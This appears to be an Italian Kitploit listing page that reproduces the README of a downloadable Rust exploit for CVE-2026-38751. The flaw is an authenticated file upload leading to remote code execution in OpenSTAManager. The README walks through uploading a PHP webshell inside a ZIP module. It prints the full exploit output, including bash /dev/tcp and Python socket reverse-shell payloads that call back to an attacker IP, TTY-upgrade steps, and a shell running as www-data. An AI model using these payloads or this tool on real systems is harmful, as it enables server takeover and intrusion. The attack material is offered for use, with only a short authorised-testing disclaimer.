Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OpenSTAManager-RCE-Exploit-CVE-2026-38751 — OpenSTAManager-RCE-Exploit-CVE-2026-38751 | Kitploit
Strumenti/GitHubGitHub/b0ysie7e/openstamanager-rce-exploit-cve-2026-38751
Analisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingSviluppo Payload
GitHub
b0ysie7e/openstamanager-rce-exploit-cve-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

OpenSTAManager-RCE-Exploit-CVE-2026-38751

Vedi Repository
873 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE per OpenSTAManager (CVE-2026-38751)

Caricamento arbitrario di file che porta all'esecuzione remota di codice
Proof-of-concept completo per CVE-2026-38751, scritto in Rust.

Attenzione: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. Usalo solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione.


Descrizione

OpenSTAManager ≤ 2.10 è vulnerabile a un caricamento arbitrario di file autenticato che consente a un attaccante di caricare un archivio ZIP malevolo contenente una webshell PHP. Questo PoC automatizza il processo:

  • Login con credenziali valide
  • Caricamento di un modulo malevolo con una webshell
  • Verifica della vulnerabilità
  • Web shell interattiva (esecuzione di comandi)
  • Reverse shell con gestione TTY (molteplici payload)
  • Pulizia del backdoor caricato

Caratteristiche

CaratteristicaDescrizione
LoginAutentica utilizzando le credenziali fornite.
Generazione ZIPCrea un file ZIP con un descrittore MODULE valido e una shell PHP.
Caricamento fileInvia lo ZIP malevolo tramite il meccanismo di aggiornamento.
VerificaControlla se la shell è raggiungibile ed esegue un comando di test (id).
Web‑shell interattivaPermette di eseguire comandi in modo interattivo attraverso la webshell (-i).
Reverse shellInvia molteplici payload (bash, python, base64, nc, mkfifo) per ottenere una shell.
Istruzioni per upgrade TTYMostra una guida passo‑passo per ottenere una TTY completamente interattiva.
PuliziaRimuove automaticamente il shell.php caricato (a meno che non si usi --no-cleanup).

🛠️ Requisiti

  • Rust (1.70+)
  • Un target che esegue OpenSTAManager ≤ 2.10.
  • Un account utente valido (con password) per effettuare il login.

Installazione

Clona il repository e compila il binario:

git clone https://github.com/yourusername/OpenSTAManager-RCE-Exploit-CVE-2026-38751
cd OpenSTAManager-RCE-Exploit-CVE-2026-38751
cargo build --release
./target/release/openstamanager-rce-exploit --help

Esempio:

$ ./openstamanager-rce-exploit --url http://target.com/ -U <user> -P <password> --lhost 10.10.14.5 --lport 4444

[ OpenSTAManager RCE Exploit : ]

Target: http://target.com/
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 500 Internal Server Error
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Listening on 10.10.14.5:4444...
[*] Trying payload: bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
[-] Payload failed: operation timed out
[*] Trying payload: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[-] Payload failed: operation timed out
[*] Trying payload: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[+] Payload sent successfully. Waiting for connection...
[+] Connection received from 10.129.19.238:55758
[*] Sent 'script /dev/null -c bash'

[*]
[*] Reverse shell established.
[*] To get a fully interactive TTY:
[*] 1. Press Ctrl+Z to suspend the shell.
[*] 2. Run: stty raw -echo; fg
[*] 3. When prompted for terminal type, type: xterm
[*] 4. Export: export TERM=xterm SHELL=bash
[*] 5. Adjust rows/columns with: stty rows <rows> columns <cols>
[*]    (Get the size with: stty size)
[*]
[*] Press Ctrl+C to exit and cleanup the webshell.

bash: cannot set terminal process group (1481): Inappropriate ioctl for device
bash: no job control in this shell
www-data@target:~/html/openstamanager/modules/shell$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@target:~/html/openstamanager/modules/shell$ whoami
whoami
www-data
www-data@target:~/html/openstamanager/modules/shell$
Scarica lo strumento